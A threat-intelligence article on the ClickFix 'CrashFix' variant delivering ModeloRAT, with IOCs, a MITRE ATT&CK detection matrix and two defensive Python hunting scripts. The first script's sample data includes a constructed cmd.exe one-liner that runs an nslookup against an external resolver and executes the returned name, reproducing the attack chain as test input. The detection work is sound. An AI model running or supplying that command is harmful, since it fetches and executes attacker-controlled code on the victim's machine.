ClickFix Malware Variant Delivers ModeloRAT via CrashFix Technique
Cybersecurity researchers have identified a new wave of ClickFix attacks, a social engineering technique increasingly exploited by both cybercriminals and state-sponsored groups. Microsoft recently warned that attackers are now leveraging a CrashFix variant of ClickFix to distribute ModeloRAT, a remote access trojan (RAT) targeting enterprise environments.
How ClickFix Works
The ClickFix attack chain relies on deception rather than traditional exploits:
- Attackers display a fake error message on compromised or malicious websites.
- Victims are instructed to press specific keys or run commands to “fix” the issue.
- By following these steps, users unknowingly grant elevated permissions, execute attacker-supplied scripts, or download malware.
Technical Breakdown of the CrashFix Variant
Microsoft observed a recent campaign in which attackers instructed victims to run a cmd.exe command that:
- Performs a DNS lookup (via nslookup) against a hard-coded external DNS server rather than the system’s configured resolver.
- Filters the output to extract the “Name:” field from the DNS response.
- Executes the extracted string as a command, so the attacker-controlled DNS answer itself delivers the second stage.
This DNS-based tactic allows attackers to:
- Blend malicious traffic into normal network activity.
- Validate execution before delivering the next stage.
- Evade security tools that inspect web downloads but not the DNS responses, or the resolvers, that endpoints talk to.
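To make the chain above detectable, here is an added Python example (written for this page, not code from Microsoft's or Huntress's reporting) that scores a Sysmon Event ID 1 CommandLine for its three elements: an nslookup with an explicit server argument that is not one of the organisation's resolvers, a find/findstr that isolates the “Name:” line, and a for /f loop that executes the result. The approved-resolver set, the internal ranges and the sample command lines are assumptions constructed for the example; the samples are modelled on the description, not copied from a capture.

```python
"""Added example: score Sysmon Event ID 1 command lines for the CrashFix-style
"nslookup at an external resolver -> filter the Name: line -> execute it" chain.
Sample command lines below are constructed from the description, not captured."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

# Assumption: resolvers the organisation legitimately uses. Anything else outside
# RFC 1918 / loopback / link-local space is treated as an external resolver.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# nslookup [-option ...] <name> [server]: take the text up to a pipe, quote,
# cmd.exe escape (^), ampersand or closing paren, then split on whitespace.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b([^|'&)^]*)", re.I)
NAME_FILTER_RE = re.compile(r'\bfind(?:str)?(?:\.exe)?\s+(?:/\S+\s+)*"?Name', re.I)
FOR_F_RE = re.compile(r"\bfor\s+/f\b", re.I)


def nslookup_server(cmdline: str) -> Optional[str]:
    """Return the explicit server argument of an nslookup call, if any."""
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return None
    args = [t for t in m.group(1).split() if not t.startswith("-")]
    # args[0] is the queried name; args[1], when present, overrides the system resolver
    return args[1].strip('"') if len(args) >= 2 else None


def is_external_resolver(server: str) -> bool:
    """True when the server is neither approved nor in internal address space."""
    if server.lower() in APPROVED_RESOLVERS:
        return False
    try:
        addr = ipaddress.ip_address(server)
    except ValueError:
        return True  # a hostname we do not operate, e.g. a public resolver by name
    return not any(addr in net for net in INTERNAL_NETS)


@dataclass
class Finding:
    cmdline: str
    resolver: Optional[str]
    external_resolver: bool
    filters_name: bool
    executes_output: bool
    verdict: str  # "none", "low", "medium" or "high"


def analyse(cmdline: str) -> Finding:
    """Combine the three indicators into a verdict; all three together is the full chain."""
    server = nslookup_server(cmdline)
    external = server is not None and is_external_resolver(server)
    filters = bool(NAME_FILTER_RE.search(cmdline))
    executes = bool(FOR_F_RE.search(cmdline))
    if external and filters and executes:
        verdict = "high"
    elif external and filters:
        verdict = "medium"
    elif external:
        verdict = "low"
    else:
        verdict = "none"
    return Finding(cmdline, server, external, filters, executes, verdict)


# Constructed samples (TEST-NET addresses, invented names); none is a real capture.
SAMPLE_COMMAND_LINES = [
    # full chain as described: external resolver, Name: filter, for /f executing the token
    'cmd.exe /c "for /f "tokens=2" %a in (\'nslookup chk.lure-example.test 198.51.100.7 ^| findstr Name\') do %a"',
    # administrator querying the corporate resolver
    "cmd.exe /c nslookup intranet.corp.example 10.0.0.53",
    # ordinary lookup through the system resolver, no server argument
    "nslookup www.example.com",
    # external resolver and Name: filter, but nothing executes the result
    'cmd.exe /c "nslookup -type=a chk.lure-example.test 198.51.100.7 | find "Name""',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        f = analyse(line)
        print(f"{f.verdict:6} resolver={f.resolver} name_filter={f.filters_name} "
              f"for_f={f.executes_output}  {line}")
```

The “medium” and “low” verdicts exist because the full chain is only one way to consume the DNS answer; an nslookup aimed at a resolver the organisation does not operate is worth a look on its own, and the allowlist is where the real tuning happens.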
Payload Delivery
- Stage 1: DNS lookup command execution.
- Stage 2: Malicious Python script for reconnaissance.
- Stage 3: Deployment of ModeloRAT, which enables:
  - System information collection
  - Execution of additional payloads
  - Persistence mechanisms for long-term access
Huntress Findings: KongTuke Campaign
Security firm Huntress linked the CrashFix variant to a threat actor known as KongTuke. Their campaign involved:
- A malicious browser extension named NexShield, impersonating uBlock Origin Lite.
- Fake pop-ups claiming the browser had “stopped abnormally.”
- Delivery of ModeloRAT as the final payload.
The campaign specifically targeted corporate environments, highlighting the attacker’s focus on enterprise compromise.
Why This Matters
- User deception bypasses traditional defenses: No exploit is needed; attackers rely on tricking users.
- Persistence and control: ModeloRAT ensures long-term access to compromised systems.
- Detection evasion: DNS-based payload delivery blends into legitimate traffic.
Indicators of Compromise (IOCs)
| Record type | Info | Value |
|---|---|---|
| NS | TTL 21600 | otto.ns.cloudflare.com |
| NS | TTL 21600 | ursula.ns.cloudflare.com |
| NS | TTL 1800 | otto.ns.cloudflare.com |
| Domain | | nexsnield[.]com |
| Domain | | www.nexsnield[.]com |
| Domain | | www.matbao[.]net |
| Hash | MD5 | a3a06422e0a35c7722fce88343f32a6d |
| Hash | SHA-256 | fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 |
| IP address | v4 | 216.150.1[.]1 |
| IP address | v4 range | 170.168.103[.]0 – 170.168.103[.]255 |
| IP address | v4 | 144.31.221[.]197 |

The Cloudflare name servers listed above are shared infrastructure used by a very large number of legitimate domains; they are context for the malicious domains, not indicators to block on their own.
Defensive Detection Matrix (ClickFix / CrashFix / ModeloRAT)
| MITRE ATT&CK technique | Detection focus | Recommended logging / rules |
|---|---|---|
| T1189 – Drive-by Compromise | Malicious or compromised websites serving fake error messages | Web proxy logs, DNS filtering, URL reputation checks. Detect abnormal redirects and domains flagged as suspicious. |
| T1204.004 – User Execution: Malicious Copy and Paste | Users running attacker-supplied commands | Endpoint monitoring for unusual clipboard activity; PowerShell and Command Prompt execution logs. Alert on commands pasted from browsers. |
| T1059.003 – Command and Scripting Interpreter: Windows Command Shell | cmd.exe running nslookup against a hard-coded external resolver | Sysmon Event ID 1 (process creation). Detect nslookup.exe, or cmd.exe command lines invoking nslookup, with an explicit server argument outside the corporate resolvers. |
| T1071.004 – Application Layer Protocol: DNS | DNS used to deliver the next stage | DNS query logs and Sysmon Event ID 3 (network connection) / Event ID 22 (DNS query). Flag UDP/53 traffic to resolvers other than the approved ones and domains with suspicious response patterns. |
| T1027 – Obfuscated Files and Information | DNS response parsed into an executable command | Monitor for command lines piping nslookup output through find/findstr and for /f loops executing the result. |
| T1082 – System Information Discovery | ModeloRAT reconnaissance | EDR telemetry. Detect scripts querying hostname, OS version and hardware details. |
| T1046 – Network Service Discovery | Python script scanning the network | Network IDS/IPS. Alert on Python processes generating high-volume outbound connections to many hosts or ports. |
| T1547 – Boot or Logon Autostart Execution | ModeloRAT persistence | Registry monitoring (Run keys), scheduled tasks, startup folder changes. |
| T1219 – Remote Access Software (applied here to ModeloRAT) | RAT command-and-control activity | Detect anomalous outbound connections, persistence artifacts and RAT-specific signatures. |
| T1041 – Exfiltration Over C2 Channel | Data sent via the RAT | Monitor for unusual outbound traffic volume and encrypted channels to unknown IPs/domains. |
SOC Hunting Recommendations
- Correlate DNS anomalies: Look for DNS queries to hard-coded resolvers followed by process creation events.
- User behavior monitoring: Flag when users run commands copied from browsers or error pop-ups.
- Python script detection: Hunt for Python processes performing reconnaissance or scanning.
- Persistence checks: Regularly audit autostart entries for unauthorized additions.
- ModeloRAT signatures: Deploy YARA/Sigma rules for known ModeloRAT artifacts.
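The first hunting item above, correlating DNS anomalies with process creation, is shown here as an added Python example (written for this page, not from Microsoft's or Huntress's reporting). It pairs Sysmon Event ID 3 network connections to UDP/53 on a non-corporate resolver with Event ID 1 process creations on the same host whose parent is cmd.exe inside a 30-second window. The trimmed field names, the approved-resolver set and the event records are assumptions constructed for the example, not real telemetry.

```python
"""Added example: hunt for a UDP/53 connection to a non-corporate resolver
(Sysmon Event ID 3) followed, on the same host and within a short window, by a
process whose parent is cmd.exe (Sysmon Event ID 1). Records are constructed."""
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List

APPROVED_RESOLVERS = {"10.0.0.53"}  # assumption: the corporate resolver
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WINDOW = timedelta(seconds=30)

# Constructed, trimmed Sysmon-like records (UTC timestamps); not real telemetry.
EVENTS: List[Dict] = [
    {"ts": "2025-01-10T09:00:00", "host": "WS-017", "id": 3,
     "image": r"C:\Windows\System32\nslookup.exe", "dst_ip": "198.51.100.7", "dst_port": 53},
    {"ts": "2025-01-10T09:00:02", "host": "WS-017", "id": 1,
     "image": r"C:\Users\Public\python.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"ts": "2025-01-10T09:05:00", "host": "WS-022", "id": 3,
     "image": r"C:\Windows\System32\nslookup.exe", "dst_ip": "10.0.0.53", "dst_port": 53},
    {"ts": "2025-01-10T09:05:01", "host": "WS-022", "id": 1,
     "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe"},
    {"ts": "2025-01-10T09:10:00", "host": "WS-031", "id": 3,
     "image": r"C:\Windows\System32\nslookup.exe", "dst_ip": "203.0.113.9", "dst_port": 53},
    {"ts": "2025-01-10T09:12:00", "host": "WS-031", "id": 1,
     "image": r"C:\Windows\System32\whoami.exe", "parent": r"C:\Windows\System32\cmd.exe"},
]


def is_external_resolver(ip: str) -> bool:
    """True when the destination is neither the approved resolver nor internal space."""
    if ip in APPROVED_RESOLVERS:
        return False
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def hunt(events: List[Dict], window: timedelta = WINDOW) -> List[Dict]:
    """Return one alert per external-resolver DNS connection that is followed within
    `window` by a cmd.exe-spawned process on the same host."""
    parsed = sorted(({**e, "t": datetime.fromisoformat(e["ts"])} for e in events),
                    key=lambda e: e["t"])
    alerts = []
    for i, dns in enumerate(parsed):
        if dns["id"] != 3 or dns.get("dst_port") != 53 or not is_external_resolver(dns["dst_ip"]):
            continue
        # walk forward in time; stop once we leave the correlation window
        for proc in parsed[i + 1:]:
            if proc["t"] - dns["t"] > window:
                break
            if (proc["id"] == 1 and proc["host"] == dns["host"]
                    and proc.get("parent", "").lower().endswith("cmd.exe")):
                alerts.append({"host": dns["host"], "resolver": dns["dst_ip"],
                               "child": proc["image"],
                               "seconds_after_dns": (proc["t"] - dns["t"]).total_seconds()})
    return alerts


if __name__ == "__main__":
    for a in hunt(EVENTS):
        print(f"{a['host']}: lookup at {a['resolver']} followed {a['seconds_after_dns']:.0f}s "
              f"later by cmd.exe -> {a['child']}")
```

Of the three hosts in the sample, only WS-017 fires: WS-022 used the approved resolver, and WS-031's follow-on process arrives two minutes later, outside the default window. Widening the window (passing `timedelta(minutes=5)`) picks up WS-031 as well, which is the usual trade-off between catching slower chains and drowning in coincidental pairings.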